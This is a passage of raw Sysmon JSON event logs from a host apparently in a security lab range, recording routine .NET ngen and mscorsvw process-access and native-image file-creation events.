C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.131","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-00104D6C0F00}","TargetProcessId":"4880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7870,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:40.444\r\nProcessGuid: {41C8662E-2290-5F25-0000-00104D6C0F00}\r\nProcessId: 4880\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1310-0\\System.Net.dll\r\nCreationUtcTime: 2020-08-01 08:06:40.444","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:40.444","ProcessGuid":"{41C8662E-2290-5F25-0000-00104D6C0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1310-0\\System.Net.dll","CreationUtcTime":"2020-08-01 08:06:40.444","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7871,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.475\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-00109D6F0F00}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.475","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-00109D6F0F00}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7872,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.475\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-00109D6F0F00}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.475","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-00109D6F0F00}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7873,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.490\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-00109D6F0F00}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.490","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-00109D6F0F00}","TargetProcessId":"4840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7874,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.522\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-0010D5720F00}\r\nTargetProcessId: 1676\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.522","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-0010D5720F00}","TargetProcessId":"1676","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7875,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.522\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-0010D5720F00}\r\nTargetProcessId: 1676\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.522","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-0010D5720F00}","TargetProcessId":"1676","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7876,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.522\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-0010D5720F00}\r\nTargetProcessId: 1676\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.522","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-0010D5720F00}","TargetProcessId":"1676","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7877,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:40.553\r\nProcessGuid: {41C8662E-2290-5F25-0000-0010D5720F00}\r\nProcessId: 1676\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\68c-0\\System.Net.Http.WebRequest.dll\r\nCreationUtcTime: 2020-08-01 08:06:40.553","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:40.553","ProcessGuid":"{41C8662E-2290-5F25-0000-0010D5720F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\68c-0\\System.Net.Http.WebRequest.dll","CreationUtcTime":"2020-08-01 08:06:40.553","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7878,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.584\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-001072760F00}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v